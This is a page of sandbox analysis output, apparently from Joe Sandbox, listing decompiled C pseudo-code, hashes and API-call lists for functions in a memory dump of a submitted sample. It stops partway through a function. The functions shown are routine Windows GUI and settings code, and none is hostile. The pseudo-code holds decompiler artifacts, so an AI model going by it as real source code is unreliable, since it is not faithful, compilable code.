Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction ID: 12d90742d37334e6a7f33d2c848e5a22a1ecdf716f2821100b5f1ee929164941
Opcode Fuzzy Hash: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction Fuzzy Hash: 3C113C71600609AFDB20DFAAC984D9BBBECEF44344B00482EF54AC3650D674EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 00422C42, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422C42(void* __ecx) {
				void* __ebp;
				void* _t6;
				void* _t8;
				void* _t27;
				void* _t30;
				void* _t32;

				_t32 = __ecx;
				_t6 = E004136A7(__ecx);
				if(_t6 != 0) {
					if((E00416528(_t32) & 0x00000001) != 0) {
						_t27 = E00414CEF(_t32);
						_t30 = E00413740(_t32, GetForegroundWindow());
						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
							_push(1);
							_pop(0);
						}
						asm("sbb eax, eax");
						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
					}
					_t8 = 1;
					return _t8;
				}
				return _t6;
			}

0x00422c43
0x00422c45
0x00422c4c
0x00422c58
0x00422c64
0x00422c78
0x00422c7c
0x00422ca7
0x00422ca9
0x00422ca9
0x00422cac
0x00422cbe
0x00422cc2
0x00422cc5
0x00000000
0x00422cc5
0x00422cc7

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetForegroundWindow.USER32 ref: 00422C66
GetLastActivePopup.USER32(?), ref: 00422C81
SendMessageA.USER32 ref: 00422C9D
SendMessageA.USER32 ref: 00422CBE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction ID: 235acb9714286046b2b697988b516babaf9458fdd3923160d87edcd70ef93c92
Opcode Fuzzy Hash: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction Fuzzy Hash: 2301F2723403153EEB212A73FD51FAE6209AB40B55F50083ABA01DA2D1DAADDD86416C

Uniqueness

Uniqueness Score: -1.00%

Function 00417748, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417748(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E004131DD(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E004176E1(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E00417D15(_t34, GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

0x00417748
0x0041774b
0x0041774e
0x0041775a
0x00417769
0x0041775c
0x00417765
0x00417765
0x0041776b
0x0041777c
0x0041778e
0x00417792
0x0041779a
0x0041779a
0x004177a6
0x004177a6
0x004177ae
0x004177b4
0x004177bc

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
DuplicateHandle.KERNEL32(00000000), ref: 00417785
GetLastError.KERNEL32(00000000), ref: 0041779F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction ID: 78f57001bf266bd8873ef29effcb20f5a2db12ccf0cf7036e4147b7dfe15a156
Opcode Fuzzy Hash: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction Fuzzy Hash: CC018435704304BBEB10ABA9DC49FAA7BB8DF44760F244526F915CB2D1DB64EC8087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00410C4F, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

0x00410c54
0x00410c5b
0x00410c5e
0x00410c61
0x00410c62
0x00410c67
0x00410c6d
0x00410c71
0x00410c7a
0x00410c7e
0x00410c95
0x00410ca7
0x00410cab
0x00410cba
0x00410cba
0x00410cad
0x00410cae
0x00410cb6
0x00410cb8
0x00000000
0x00000000
0x00410cb8
0x00410c8c
0x00410c8c
0x00410c8c
0x00410c7e
0x00410cbf

APIs

WindowFromPoint.USER32(?,?), ref: 00410C67
GetParent.USER32(00000000), ref: 00410C74
ScreenToClient.USER32 ref: 00410C95
IsWindowEnabled.USER32(00000000), ref: 00410CAE

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction ID: b03e2d05c99e3754afe2f9c82b4a20bfc763fe38c38db5da76ce186bf725b679
Opcode Fuzzy Hash: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction Fuzzy Hash: 8D01D436600614BF87169B989C44DEF7BB9EF85740B140129F905D7310EB78DD818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 00426CBA, Relevance: 6.0, APIs: 4, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00426CBA(intOrPtr __ecx, void* __eflags) {
				void* _t21;
				intOrPtr* _t32;
				struct HICON__** _t40;
				intOrPtr _t43;
				void* _t45;

				E00406520(E0042A113, _t45);
				_push(__ecx);
				_t43 = __ecx;
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
				 *(_t45 - 4) = 1;
				E00419BEE(__ecx + 0x78);
				_t39 =  *((intOrPtr*)(_t43 + 0x114));
				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
					E004288AC(_t39);
					E00413206(_t39);
				}
				E00413206( *((intOrPtr*)(_t43 + 0x88)));
				_t32 =  *((intOrPtr*)(_t43 + 0x74));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 4))(1);
				}
				_t40 = _t43 + 0x100;
				if( *(_t43 + 0x100) != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyCursor( *_t40);
				}
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				E00419C1F(_t43 + 0x78);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				_t21 = E0041AD27(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t21;
			}

0x00426cbf
0x00426cc4
0x00426cc6
0x00426cc9
0x00426ccc
0x00426cd5
0x00426cdc
0x00426ce1
0x00426ce9
0x00426ced
0x00426cf3
0x00426cf8
0x00426cff
0x00426d05
0x00426d0a
0x00426d10
0x00426d10
0x00426d1a
0x00426d20
0x00426d30
0x00426d38
0x00426d38
0x00426d3e
0x00426d45
0x00426d4a
0x00426d50
0x00426d5a
0x00426d62

APIs

__EH_prolog.LIBCMT ref: 00426CBF
LoadCursorA.USER32 ref: 00426D29
SetCursor.USER32(00000000), ref: 00426D30
DestroyCursor.USER32(00000000), ref: 00426D38

Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction ID: 779aaf76a531418baa36e2a5a867f58700d8f9a93bf22c0d14db93a2c62a59f0
Opcode Fuzzy Hash: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction Fuzzy Hash: A511E031300600DBE735AF65E806BEEBBA5EF44714F50012FE16697291CBB82981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0D, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t16 = GetDlgItem(_a4, _a8);
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						if(_t17 == 0) {
							break;
						}
						_t12 = E00414E0D(_t17, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00413740(_t18);
						}
						_t12 = E00413767();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E00414E0D(_t16, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

0x00414e24
0x00414e28
0x00414e58
0x00414e5b
0x00414e5d
0x00414e5d
0x00414e61
0x00000000
0x00000000
0x00414e6a
0x00414e71
0x00414e76
0x00000000
0x00414e76
0x00000000
0x00414e71
0x00000000
0x00414e2a
0x00414e2f
0x00414e41
0x00414e45
0x00414e46
0x00000000
0x00414e48
0x00414e4f
0x00414e56
0x00000000
0x00000000
0x00414e31
0x00414e38
0x00414e3f
0x00000000
0x00000000
0x00414e3f
0x00414e2f
0x00414e83
0x00414e83

APIs

GetDlgItem.USER32 ref: 00414E18
GetTopWindow.USER32(00000000), ref: 00414E2B
GetTopWindow.USER32(?), ref: 00414E5B
GetWindow.USER32(00000000,00000002), ref: 00414E76

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED

Uniqueness

Uniqueness Score: -1.00%

Function 00414E86, Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00413767();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E0041357F(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

0x00414e86
0x00414e94
0x00414e96
0x00414e96
0x00414e9a
0x00000000
0x00000000
0x00414ea0
0x00414eca
0x00414ea2
0x00414ea2
0x00414ea3
0x00414eaa
0x00414eac
0x00414eaf
0x00414eb2
0x00414eb5
0x00414eb8
0x00414eb9
0x00414eb9
0x00414eaa
0x00414ed4
0x00414eed
0x00414eed
0x00414ef5
0x00414ef5
0x00414f00

APIs

GetTopWindow.USER32(?), ref: 00414E94
SendMessageA.USER32 ref: 00414ECA
GetTopWindow.USER32(00000000), ref: 00414ED7
GetWindow.USER32(00000000,00000002), ref: 00414EF5

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412FC3, Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E004166CE( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

0x00412fc3
0x00412fc4
0x00412fc6
0x00412fcb
0x00412ff9
0x00412ffb
0x00413007
0x00413013
0x00413018
0x0041301d
0x0041301f
0x0041301f
0x00413036
0x00413036
0x00413007
0x00413042
0x00413048
0x00413048
0x00000000
0x00413048
0x00412fd1
0x00413050
0x00413050
0x00412fd9
0x00412feb
0x00000000

APIs

EnableMenuItem.USER32 ref: 00412FEB
GetFocus.USER32 ref: 00412FFE
GetParent.USER32(?), ref: 0041300C
GetNextDlgTabItem.USER32 ref: 00413028

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58

Uniqueness

Uniqueness Score: -1.00%

Function 00428D0F, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00428D0F(intOrPtr* __ecx, int _a4) {
				struct HDC__* _t8;
				int _t16;
				void* _t18;
				void* _t21;
				intOrPtr* _t22;

				_t16 = _a4;
				_t22 = __ecx;
				_t21 = GetStockObject(_t16);
				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
					_t8 =  *(_t22 + 4);
					if(_t8 != 0) {
						SelectObject(_t8, _t21);
					}
					_push(SelectObject( *(_t22 + 8), _t21));
					return E0041A5FC();
				} else {
					_push(SelectObject( *(_t22 + 8), _t21));
					_t18 = E0041A5FC();
					if( *(_t22 + 0x2c) != _t21) {
						 *(_t22 + 0x2c) = _t21;
						E00428D7F(_t22);
					}
					return _t18;
				}
			}

0x00428d10
0x00428d16
0x00428d22
0x00428d24
0x00428d5c
0x00428d67
0x00428d6b
0x00428d6b
0x00428d73
0x00000000
0x00428d35
0x00428d3f
0x00428d48
0x00428d4a
0x00428d52
0x00428d55
0x00428d55
0x00000000
0x00428d4c

APIs

GetStockObject.GDI32(?), ref: 00428D19
SelectObject.GDI32(?,00000000), ref: 00428D39
SelectObject.GDI32(?,00000000), ref: 00428D6B
SelectObject.GDI32(?,00000000), ref: 00428D71

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004253EE, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x004253f2
0x004253ff
0x0042544f
0x00425458
0x00425461
0x00425467
0x0042546a
0x00000000
0x0042546a
0x00425420
0x0042543a
0x00000000

APIs

IsWindow.USER32(0000E800), ref: 004253F7
SendMessageA.USER32 ref: 00425420
SendMessageA.USER32 ref: 0042543A
InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E24C, Relevance: 6.0, APIs: 4, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, "%d", _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E00425E7D(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}

0x0041e253
0x0041e259
0x0041e29d
0x00000000
0x0041e2b6
0x0041e25e
0x0041e263
0x0041e267
0x0041e278
0x0041e281
0x00000000
0x0041e28e
0x0041e2be

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
wsprintfA.USER32 ref: 0041E29D
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00424F9B, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E0041F52D(__ecx, _t19, _a8);
				_t12 = E00416528(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x00424fa2
0x00424fa6
0x00424fac
0x00424fb3
